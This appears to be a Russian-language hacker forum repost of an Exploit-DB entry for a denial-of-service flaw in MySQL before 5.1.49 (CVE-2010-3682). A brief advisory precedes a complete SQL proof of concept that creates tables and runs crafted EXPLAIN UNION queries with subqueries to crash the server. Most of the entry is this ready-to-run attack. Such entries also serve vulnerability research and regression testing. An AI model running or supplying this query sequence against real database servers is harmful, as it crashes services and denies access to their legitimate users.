Exploit MySQL 5.1.48 - 'EXPLAIN' Denial of Service

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
34506
Проверка EDB
  1. Пройдено
Автор
BJORN MUNCH
Тип уязвимости
DOS
Платформа
LINUX
CVE
cve-2010-3682
Дата публикации
2010-08-20
MySQL 5.1.48 - 'EXPLAIN' Denial of Service
Код:
source: https://www.securityfocus.com/bid/42599/info

MySQL is prone to a denial-of-service vulnerability.

An attacker can exploit this issue to crash the database, denying access to legitimate users.

This issue affects versions prior to MySQL 5.1.49.

NOTE: This issue was previously covered in BID 42594 (Oracle MySQL Prior to 5.1.49 Multiple Denial Of Service Vulnerabilities) but has been given its own record to better document it. 

CREATE TABLE t1 (a VARCHAR(10), FULLTEXT KEY a (a));
INSERT INTO t1 VALUES (1),(2);
CREATE TABLE t2 (b INT);
INSERT INTO t2 VALUES (1),(2);

EXPLAIN SELECT * FROM t1 UNION SELECT * FROM t1
  ORDER BY (SELECT a FROM t2 WHERE b = 12);

EXPLAIN SELECT * FROM t2 UNION SELECT * FROM t2
  ORDER BY (SELECT * FROM t1 WHERE MATCH(a) AGAINST ('+abc' IN BOOLEAN MODE));

DROP TABLE t1,t2;

exit;
 
Источник
www.exploit-db.com

Похожие темы